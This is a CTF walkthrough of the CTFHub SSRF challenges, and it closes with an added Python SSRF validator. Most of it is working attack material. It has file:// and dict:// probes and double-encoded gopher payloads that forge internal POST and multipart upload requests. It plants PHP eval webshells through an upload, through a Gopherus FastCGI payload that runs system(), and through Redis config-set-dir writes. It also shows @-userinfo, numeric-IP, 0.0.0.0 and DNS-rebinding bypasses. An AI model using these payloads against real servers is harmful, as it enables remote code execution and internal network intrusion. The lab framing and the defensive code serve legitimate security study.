CTFHub SSRF Walkthrough

Contents
1. Intranet access and pseudo-protocol exploitation
  1.1 Intranet access
  1.2 Reading files with pseudo-protocols
  1.3 Port scanning
2. POST request, file upload, FastCGI protocol, Redis protocol
  2.1 POST request
  2.2 File upload
  2.3 FastCGI protocol
  2.4 Redis protocol
3. Bypass series
  3.1 URL Bypass
  3.2 Numeric IP Bypass
  3.3 302 redirect Bypass
  3.4 DNS rebinding Bypass
1. Intranet access and pseudo-protocol exploitation

1.1 Intranet access

Capture the request with Burp Suite and send it to the Repeater module.
Change the url parameter to the following:

?url=127.0.0.1/flag.php

Flag: ctfhub{0f27868bd5983f24f5ce02c9}

1.2 Reading files with pseudo-protocols

Common pseudo-protocols:

file:/// Local file transfer protocol, mainly used to access files on the local machine. In CTFs it is usually used to read local files, and it is not affected by allow_url_fopen or allow_url_include.
dict:// Dictionary server protocol; dict is a query/response protocol built on TCP.
sftp:// SSH File Transfer Protocol, or Secure File Transfer Protocol: a simple lockstep-based file transfer protocol that lets a client fetch files from, or upload files to, a remote host.
ldap:// Lightweight Directory Access Protocol, an application protocol for managing and accessing distributed directory information services over IP networks.
tftp:// A lockstep-based file transfer protocol that lets a client fetch files from, or upload files to, a remote host.
gopher:// A distributed document delivery service that lets users seamlessly browse, search and retrieve information residing in different locations.
Capture the request with Burp Suite and send it to the Repeater module.
Change the url parameter to the following:

/?url=file:///var/www/html/flag.php

Flag: ctfhub{d64815f878477afcd7c92c0a}

1.3 Port scanning

The challenge says the port is somewhere between 8000 and 9000.
Use Burp Intruder together with dict:// to probe for the open port:

?url=dict://127.0.0.1:§666§

The brute force succeeds and reveals port 8902; visiting it gives the flag: ctfhub{6f042e2013b8c8ac3d92d670}

2. POST request, file upload, FastCGI protocol, Redis protocol
2.1 POST request

Challenge hint: this time send an HTTP POST request. The SSRF is implemented with PHP's curl and follows 302 redirects; a 302.php is provided.

View the source:

/?url=file:///var/www/html/index.php

Then read flag.php:

/?url=file:///var/www/html/flag.php

Requesting it from 127.0.0.1 yields key=253ac935e6c6003864751ad695c8145c. Having the KEY suggests the challenge simply wants us to send that KEY to the server to get what we are after, but the page itself shows nothing, so we have to build the POST request that carries the KEY ourselves.
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=253ac935e6c6003864751ad695c8145c

First encoding:

gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Length%3A%2036%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Akey%3D253ac935e6c6003864751ad695c8145c

This shows that the gopher protocol can submit POST parameters inside a URL.

Final encoding:

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D253ac935e6c6003864751ad695c8145c

Append it after the url parameter and send the request. Flag: ctfhub{3d11698a888f440ada017ee3}

2.2 File upload

Hint: this time you need to upload a file to flag.php. Good luck.

Accessing flag.php through the intranet shows a file upload form, but it only has a browse box and no submit button.
Add a submit control to the front-end code:

<input type="submit" name="file">

After the change it looks like this. Then upload any file and capture the request with Burp. Copy the whole captured request, create a Python script 1.py, paste the copied content into the payload of the script below, and let the script encode the request.
```python
import urllib.parse

# The raw multipart request captured in Burp, pasted verbatim.
payload = \
"""POST /flag.php HTTP/1.1
Host: challenge-52a38570217269be.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------315882083476278763087340318
Content-Length: 375
Origin: http://challenge-52a38570217269be.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-52a38570217269be.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------315882083476278763087340318
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_REQUEST[777])?>

-----------------------------315882083476278763087340318
Content-Disposition: form-data; name="file"

提交查询
-----------------------------315882083476278763087340318--

"""  # Note: the request must end with a trailing newline; that final line break marks the end of the HTTP request.

tmp = urllib.parse.quote(payload)        # first URL-encoding
new = tmp.replace("%0A", "%0D%0A")       # gopher needs CRLF line endings
result = "gopher://127.0.0.1:80/_" + new
result = urllib.parse.quote(result)      # second encoding, because the whole thing travels in a GET parameter
print(result)
```

Because the final request is sent as a GET parameter, it has to be URL-encoded twice. After encoding, the result looks like this:

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-52a38570217269be.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A109.0%2529%2520Gecko/20100101%2520Firefox/117.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------315882083476278763087340318%250D%250AContent-Length%253A%2520375%250D%250AOrigin%253A%2520http%253A//challenge-52a38570217269be.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-52a38570217269be.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------315882083476278763087340318%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_REQUEST%255B777%255D%2529%253F%253E%250D%250A%250D%250A-----------------------------315882083476278763087340318%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%25E6%259F%25A5%25E8%25AF%25A2%250D%250A-----------------------------315882083476278763087340318--%250D%250A%250D%250A

Finally append the generated encoding after the url parameter and send the request. Flag: ctfhub{b4654348ac2636aeaaecd806}
2.3 FastCGI protocol

Gopherus tool: https://github.com/tarunkant/Gopherus.git

Gopherus is a security assessment tool for discovering and exploiting the Gopher protocol. Gopher is a text-based network protocol that predates the World Wide Web. Gopherus lets security researchers, penetration testers and system administrators use the Gopher protocol to search, browse and exploit resources on Gopher servers. If port 9000 is open, an SSRF vulnerability may exist and may lead to RCE. To exploit it you need to supply the name of a file that must exist on the target host.

The site has an index.php, located at /var/www/html/index.php:

```php
<?php
error_reporting(0);
// Redirect to a default url parameter when none is supplied.
if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}
// The user-supplied URL is handed straight to curl: no scheme allow-list,
// no host check, and redirects are followed.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
```

Build the shell command to execute: base64-encode a one-line webshell and write it into a file named shell.php.

echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Generate the payload with Gopherus; the generated encoding is:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH127%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%7F%04%00%3C%3Fphp%20system%28%27echo%20%E2%80%9CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%2BCg%3D%3D%E2%80%9D%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

URL-encode the generated payload:

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH127%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%257F%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%25E2%2580%259CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%252BCg%253D%253D%25E2%2580%259D%2520%257C%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

Then enter the following in the browser, i.e. the challenge host followed by the URL-encoded payload above:

http://challenge-f6148759cf815fa1.sandbox.ctfhub.com:10800?url=<URL-encoded payload above>

Connect with AntSword and look for the flag: ctfhub{cc096ee41c566d7280067233}
2.4 Redis protocol

The Redis commands are:

flushall
set 1 '<?php eval($_GET["feng"]);?>'
config set dir /var/www/html
config set dbfilename feng.php
save

Encoded as a gopher URL:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22feng%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

Second encoding:

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Afeng.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

Once it has executed, feng.php has been written. Flag: ctfhub{d038d02bda2f613a53c11d0b}

3. Bypass series
3.1 URL Bypass

Hint: the requested URL must contain http://notfound.ctfhub.com.
First try whether plain http can reach 127.0.0.1/flag.php at all; the result is shown below.
Construct the address http://notfound.ctfhub.com@127.0.0.1/flag.php. The @ here is the URL userinfo separator: whatever follows @ is parsed as the host, and whatever precedes it is treated as the username. So this is equivalent to accessing 127.0.0.1/flag.php with the username http://notfound.ctfhub.com; the username does not matter, only the address after @ is resolved.

Flag: ctfhub{9db1dac47729d514cc144285}

3.2 Numeric IP Bypass

Capture the request with Burp and view the source: IPs starting with 127. or 172. are banned.
Try accessing url=http://127.0.0.1/flag.php directly; the result is shown below. Then try various numeric bases to bypass the filter: hexadecimal, decimal, or simply localhost.

Flag: ctfhub{8f904bada115a76336f60a02}

3.3 302 redirect Bypass

A 302 redirect sends the client from one URL on to another URL.
Check whether flag.php exists. Accessing it via 127.0.0.1 shows that this IP is blocked, so use an alternative spelling of 127.0.0.1:

Using 0.0.0.0 succeeds.

Flag: ctfhub{b875e28c53abd21d077ae32d}

Reading the index.php source (guessing the Linux path /var/www/html/index.php) also shows that anything in the IP position starting with 127, 172, 10 or 192 is rejected outright.

3.4 DNS rebinding Bypass

DNS rebinding attack: while browsing, the user types a URL containing a domain name into the address bar. The browser resolves the domain to an IP address through a DNS server, requests the resource from that IP and displays it to the user. The domain owner, however, controls which IP the domain resolves to. On the user's first visit the domain resolves to one IP; the domain holder then changes the record, and on the next request for the same domain the user gets a different IP. From the browser's point of view the whole time it is talking to the same domain, so it considers this safe. That is what makes the DNS rebinding attack possible.

Using DNS rebinding, we attack the problem at the DNS resolution step: the idea is to change the IP a domain points to so that one domain maps to two IPs; over repeated requests the observed effect is the same, and the IP filter is bypassed.

Visit the page and capture the request with Burp Suite. Use the rbndr.us DNS rebinding service (cmpxchg8b.com) and copy the generated domain after the url parameter.

Flag: ctfhub{6bf68f804e086192d449bc15}
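Every bypass in section 3 (userinfo @, hex and decimal IP forms, 0.0.0.0, localhost, 302 hops, DNS rebinding) defeats the prefix-on-the-string filter shown in the challenge source. As an added defensive example that is not part of the original write-up, the Python below puts that naive filter beside a validator that parses the URL properly, normalises numeric hosts and checks every resolved address; the RESOLVER table and the *.example hosts are constructed so it runs offline.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver table so the example runs offline. A real check calls
# socket.getaddrinfo() and must connect to the exact address it validated,
# otherwise a rebinding host (rbndr.us style) can answer differently next time.
RESOLVER = {
    "localhost": ["127.0.0.1"],
    "public.example": ["8.8.8.8"],               # any globally routable address
    "rebind.example": ["8.8.8.8", "127.0.0.1"],  # models a rebinding host
}

def naive_filter(url):
    """Mimics the challenge's check: ban hosts that start with 127/172/10/192."""
    host_part = url.split("://", 1)[-1]
    return not host_part.startswith(("127", "172", "10", "192"))

def host_to_ips(host):
    """Normalise the hex and decimal IP forms curl accepts, then resolve."""
    if re.fullmatch(r"0x[0-9a-f]+", host, re.IGNORECASE):
        return [ipaddress.ip_address(int(host, 16))]
    if host.isdigit():
        return [ipaddress.ip_address(int(host))]
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        return [ipaddress.ip_address(a) for a in RESOLVER.get(host, [])]

def is_safe_url(url):
    """Return (allowed, reason). Rejects non-HTTP schemes and any host whose
    addresses are not all globally routable. For the 302 case the same check
    must run on every hop (or CURLOPT_FOLLOWLOCATION stays off)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname  # userinfo before '@' is dropped here
    if not host:
        return False, "no host"
    ips = host_to_ips(host)
    if not ips:
        return False, "unresolvable host %r" % host
    for ip in ips:
        if not ip.is_global or ip.is_multicast:
            return False, "%s resolves to non-public %s" % (host, ip)
    return True, "ok"
```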